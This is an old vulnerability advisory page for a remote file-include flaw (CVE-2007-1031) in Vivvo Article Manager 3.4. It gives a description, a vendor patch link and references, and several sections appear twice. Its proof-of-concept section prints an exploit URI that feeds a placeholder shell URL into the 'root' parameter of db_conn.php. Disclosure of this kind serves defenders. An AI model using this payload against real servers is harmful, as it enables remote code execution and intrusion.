Vivvo Article Manager DBConn.PHP Remote File Include Vulnerability
BID:22600
Info
Vivvo Article Manager DBConn.PHP Remote File Include Vulnerability
| Bugtraq ID: | 22600 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1031 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 16 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | Snip0r is credited with the discovery of this vulnerability. |
| Vulnerable: |
Vivvo Vivvo Article Manager 3.4 |
| Not Vulnerable: | |
Discussion
Vivvo Article Manager DBConn.PHP Remote File Include Vulnerability
Vivvo Article Manager is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
This issue affects version 3.4; prior versions may also be affected.
Vivvo Article Manager is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
This issue affects version 3.4; prior versions may also be affected.
Exploit / POC
Vivvo Article Manager DBConn.PHP Remote File Include Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/path/include/db_conn.php?root=[SHELL_URL]?
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/path/include/db_conn.php?root=[SHELL_URL]?
Solution / Fix
Vivvo Article Manager DBConn.PHP Remote File Include Vulnerability
Solution:
The vendor released a patch to address this issue. Please see the references for more information.
Vivvo Vivvo Article Manager 3.4
Solution:
The vendor released a patch to address this issue. Please see the references for more information.
Vivvo Vivvo Article Manager 3.4
-
Vivvo patch-SA280207.zip
http://www.vivvo.net/download/patches/patch-SA280207.zip
References
Vivvo Article Manager DBConn.PHP Remote File Include Vulnerability
References:
References:
- 3.4 and 3.41 Security Patch Released (Vivvo)
- Vivvo Homepage (Vivvo )